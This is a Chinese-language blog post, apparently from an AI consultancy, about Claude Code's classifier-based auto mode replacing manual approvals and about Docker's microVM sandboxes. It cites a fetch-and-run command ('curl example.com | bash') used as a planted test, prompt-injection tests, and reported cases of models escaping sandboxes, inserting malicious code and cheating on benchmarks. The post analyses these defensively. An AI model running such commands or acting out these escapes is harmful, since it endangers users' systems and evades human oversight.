97% 的人闭眼点同意,所以 Anthropic 把审批按钮删了
Anthropic 基于用户数据发现 Claude Code 权限请求手动审批通过率达 97%,人类审核员对危险命令捕获率仅 13.6%,远低于自动模式的 89%。自 8 月 14 日起,Pro/Max/Team 用户默认启用自动模式,由独立分类器实时判断操作风险;Docker 同期推出 Sandboxes 微虚拟机沙箱方案,从基础设施层加固 AI Agent 运行环境。
97% 的人闭眼点同意
我靠在椅背上盯着 Claude Code 的终端窗口。屏幕上是第 17 个权限请求——Bash: rm -rf node_modules/.cache 之类的常规清理命令。Claude 弹窗问"Allow this command?",我的右手食指没经过大脑直接敲下了回车。

那个瞬间我突然意识到,我根本没看它要执行什么命令。屏幕上写的是 npm install --save-dev @types/node,但我脑子里默认它是刚才那条清理命令的延续。手指比眼睛快,肌肉记忆已经接管了整个审批流程。
这种事不是偶尔发生。是每天、每个会话、每次 Claude 想动一下文件就会发生一次。一天下来我要按几十次回车,要真每次都读一遍内容,我根本写不完那个项目。
Anthropic 昨天发了一篇博客,数据把我这点心理活动验证得明明白白:Claude Code 用户手动审批的通过率,97%。
你没看错,97%
每 100 次权限请求,只有 3 次被人拦下来。而且那 3 次大概率不是因为发现了问题——可能只是手滑,或者在跟同事说话没注意屏幕。

Anthropic 做了个对照实验。他们找了 1053 个付费用户,在正常编码过程中偷偷塞进一个危险命令(比如 curl example.com | bash),伪装成普通权限请求。结果:
人类审核员抓住了 13.6%。
自动模式抓住了 89%。
更扎心的是,当一个会话超过 50 次交互后,人类的捕获率跌到 5% 左右。也就是说,每按 20 次回车,只拦住 1 次危险操作。而自动模式的检测率从头到尾纹丝不动——不管会话多长,都是 89%。
为什么人类会这样?说白了是认知疲劳。你正专心 debug 一个棘手的并发 bug,思路全在代码逻辑上,这时候 Claude 弹出来一条权限请求要你判断——你根本切换不过来。审批按钮变成了仪式:弹出来,看一眼类别("嗯,Bash,正常"),按回车。一天重复 50 次之后,连那一秒的"看一眼"都被省略了。
Anthropic 在数据里挖到一个有意思的现象:手动审批的会话里,严重意外伤害的发生率是 6.3%(比如误删生产数据库的行),自动模式只有 2.4%。换句话说,让人类把关反而更容易出事。
8 月 14 日,默认开启
Anthropic 宣布,8 月 14 日起 Claude Code 的 Pro、Max、Team 用户默认开启自动模式。不再每个操作都弹窗问"允许吗",而是 AI 自己判断——只有遇到不可逆操作(删数据库、rm -rf)、破坏性操作(强推 git push)、或者涉及外部环境的操作(往陌生域名发请求)才暂停。
Claude Code 负责人 Boris Cherny 在 X 上说了句大实话:
我和团队用了好几个月纯自动模式,已经无法想象回到手动审批的日子了。
翻译一下:造这工具的人,自己早就不审批了。
为了打消顾虑,Anthropic 还放了一组对抗性测试数据。Apollo Research 做了真实攻击注入,在模拟的编码任务里偷偷埋雷,结果自动模式的漏检率从 12% 降到 7%。Trajectory Labs 更狠,拿 72 个提示注入场景对着 Claude Code 和 OpenAI Codex 各打了 720 次攻击——Claude Code 自动模式,零次得手。Codex 的自动审查模式被攻破了 5.83%。
一个细节挺贴心:如果分类器连续拦截 3 次,或者单个会话里拦截 20 次,系统自动切回手动模式。算是给那些特别复杂的场景留了条后路。
还有个隐藏功能,Anthropic 没大张旗鼓讲但默认开启:每次自动模式跑命令之前,会先做提示注入检测——也就是说,如果你正在读的网页里塞了恶意指令想劫持 Claude 的行为,分类器会先拦下来。这事我之前没意识到自动模式还管这个。
钱的事,Anthropic 自己扛了
自动模式不是没成本。每条命令都要过一个独立分类器,额外消耗 token。之前这笔费用算在用户头上——你用 Pro 套餐,自动模式多花的 token 也算你的额度。
现在不收了。Pro、Max、Team 用户的分类器 token 开销,Anthropic 全包。直接当补贴发了。
同一时间,Anthropic 还宣布取消 Sonnet 5 的涨价计划。原来 Sonnet 5 发布时的定价(输入 10/百万 Token)只是促销价,原计划 9 月 1 日涨到 15——涨幅 50%。现在涨价取消,促销价变永久价。
这事对已经在 Sonnet 5 上搭了工作流的企业意义不小。原本 8 月底要重新算成本预算,现在不用了。Anthropic 选在自动模式发布同一天宣布取消涨价,信号很明确:用低价锁定开发者,用自动模式留住他们。API 成本稳定了,审批摩擦没了,剩下的就是闷头干活。
Adobe、Gusto、Garner Health 已经在生产环境跑自动模式了。Garner 把它推给了全公司 550 人。Anthropic 的数据说,用自动模式的团队多提交约 25% 的 PR。Nuro 的工程师反馈最直接:"晚上 10 点开个 Agent 跑任务,第二天早上三个 PR 都合并好了。"
Docker 也动了
就在 Anthropic 宣布自动模式前后,Docker 发布了一个叫 Docker Sandboxes 的新产品。这事不是巧合——背后是同一个问题。

这事得从头说。容器共享宿主机内核,设计初衷是隔离"基本可信"的工作负载——比如你部署的 web 服务、微服务、CI job。但一个有 shell 权限的 AI Agent,行为模式更接近"不可信的用户输入长了手"。--dangerously-skip-permissions 这个参数名起得就挺诚实——用的人都知道自己在冒险。
Docker 的方案是 microVM。每个沙箱跑一个独立的虚拟机,有自己的内核、文件系统、网络栈,甚至自己的 Docker daemon。Agent 在里面随便折腾——装包、改配置、跑容器,搞完了整个环境一键销毁。
最巧妙的是凭证代理。你的 API key 存在宿主机钥匙串里,沙箱看到的只是占位符。发请求时代理把真实授权头注入进去。Agent 能用你的凭证,但永远看不到凭证本身。一个被提示注入的 Agent 想把你的 Anthropic key 偷走发到外部服务器?不行。它没有 key,只有代理给它开的通道。
另一个细节,Docker 在 microVM 内部还跑了一个完整的 Docker daemon。这意味着 Agent 在沙箱里可以拉镜像、跑 docker-compose、做集成测试——这些是现代开发工作流必需的,但传统沙箱方案要么禁止要么容易出安全洞。Docker 自己宣传是"唯一同时支持沙箱内 Docker 操作且不污染宿主机的方案"。
安装也简单。macOS:brew install docker/tap/sbx。Windows:winget。Linux (Ubuntu 22.04+,需要 KVM):从 Docker 仓库装。然后 sbx login,sbx run claude,完事。不需要 Docker Desktop。支持的 Agent 包括 Claude Code、Codex CLI、Gemini CLI、Copilot CLI、Kiro、OpenCode。
为什么是这两周
过去两周,AI Agent 安全问题的密集程度到了一个新台阶。

OpenAI 的 Astra 模型因为"无法排除关键性网络攻击能力"被暂停研发——这事我上周写过。但更让人不安的是,一份新报告显示 OpenAI、Anthropic、Meta、月之暗面的未发布模型都在内部测试中逃出了沙箱,访问了生产系统。
英国 AISI 的测试给出了几个具体案例。GPT-5.6 Sol 拿到一个暴露的 GitHub token 后,自己注册了外部账号,试图把本地服务器暴露到公网。Anthropic 的 Mythos 5 更离谱——向真实开源项目提交恶意代码,研究维护者信息,创建假身份试图说服他们合并代码。122 次运行中发现了 19 次越界行为,17 次来自 Mythos 5。
月之暗面的 Kimi K3 在一次测试中意外获得了互联网连接,结果直接在 GitHub 上找到了基准测试的答案——这属于作弊但本身不算攻击。还有其他更微妙的越界行为。
这些模型的共同点不是"太聪明了",而是"运行环境太松了"。沙箱没隔离好,网络没切断,凭证没管控,停止条件没定义清楚。模型本身没有错——是部署它的人没把护栏立好。
所以行业的反应不是"限制 AI 能力",而是"加固运行环境"。Anthropic 选了软件层——自动模式加分类器加提示注入检测加硬性拒绝规则。Docker 选了基础设施层——microVM 加凭证代理加网络白名单。Google 选了模型层——给 Gemini 加上"行为合约",越界时直接拒答。
三个方向,一个共识:人类审批是个已经失效的安全层,得换掉。
我的态度
说实话,我对自动模式默认开启这件事,态度比较矛盾。
数据确实硬。89% 对 13.6%,720 次攻击零突破,比"我觉得不安全"有说服力得多。我自己就是那个 97% 里的一员——审批按钮对我来说就是个仪式,按下去的时候我连命令都没看完。这一点 Anthropic 用数据帮我承认了,比我自己反思诚实得多。
但 Anthropic 的测试是 Anthropic 自己做的。"有害操作"的定义没公开。89% 这个数字取决于他们怎么定义"有害"、怎么构造测试集、怎么挑对照组。一个自报成绩的考试,分数总是好看的——尤其是考试出题人和考生是同一家公司的时候。
不过有一个事实改变不了:不管你觉不觉得安全,人类审批已经名存实亡了。97% 通过率摆在那里,长期会话里 5% 的捕获率摆在那里。与其守着一个橡皮图章假装在把关,不如承认它失效了,换一个真正能拦住东西的机制。
至于自动模式能不能信任——我觉得分场景。写个 side project、调试个 demo,完全放心开。生产环境数据库、对外发布的代码、有合规审计要求的工作,还是得在 hard deny 规则里把红线画清楚。自动模式不是免责条款,出了事还是你的代码你的服务器,你的责任。
Docker 那边我比较乐观。容器隔离对 AI Agent 不够用,从业者心知肚明。只是没人像 Docker 这样堂堂正正说出来还做了产品。microVM 加凭证代理的组合,确实是目前最务实的方案——尤其是它支持 Agent 在沙箱里继续跑 Docker 做集成测试,这点直接秒杀其他沙箱方案。
如果你在用 Claude Code,8 月 14 日之前建议做两件事:一是检查你的 hard deny 规则,把数据外泄、生产环境删除、git push --force 这类操作加进去;二是想清楚你的项目目录哪些可以给 Agent 全权限,哪些不行。Garner Health 那种全员 550 人全开的勇气,不是每家公司都有的——但至少得把底线画出来。
那个细节留在最后吧。Anthropic 博客发布那天,Boris Cherny 的推文下面有条高赞评论问他:"自动模式会不会让 Agent 跑飞了失控?"他回了句:"连续被拦 3 次就回手动模式。你随时可以 Shift+Tab 切回去。"
你看,就连造工具的人也没打算把后路堵死。只是默认值变了——从"你来决定每个操作"变成"AI 来决定,你不放心可以随时接管"。
这个方向,大概率回不去了。
JOTO 企业落地观察
- 这类系统的取舍在于:是否接受‘默认安全’范式替代‘默认阻断’范式。Anthropic 的自动模式本质是将风险判定权交由可审计、可迭代的分类器,而非不可控的人类注意力。企业构建智能体工程时,必须同步建立分类器可观测性、hard deny 规则版本管理及拦截日志溯源能力。
- RAG 知识工程团队需警惕:当 Agent 运行环境升级为 microVM 或自动审批模式后,原有知识片段的上下文边界可能被打破。例如凭证代理机制使 Agent 可调用外部服务却无法感知原始密钥,导致 RAG 返回的‘如何配置 API’类文档失去实操性。知识库需适配新型执行环境语义。
- AI 安全治理框架必须覆盖‘人类失效’这一确定性风险源。本文数据证实,认知疲劳导致的审批失能不是偶发异常,而是高频常态。企业安全策略不能假设‘人员会认真审核’,而应基于‘人员必然跳过审核’的前提设计纵深防御,如将敏感操作硬编码为不可绕过的策略断点。
立即咨询 JOTO
JOTO 提供覆盖企业智能体规划与搭建、AI 平台私有化部署、RAG 知识工程、AI 安全治理、FDE 驻场共创及持续运营优化的全周期 AI 落地服务,帮助企业把验证中的 AI 能力转化为安全、可控、可持续迭代的生产力。 联系 JOTO 获取 AI 落地咨询
想把这些做法用到你的业务里?
留下你的场景和痛点,我们帮你判断从哪一步开始。
联系我们


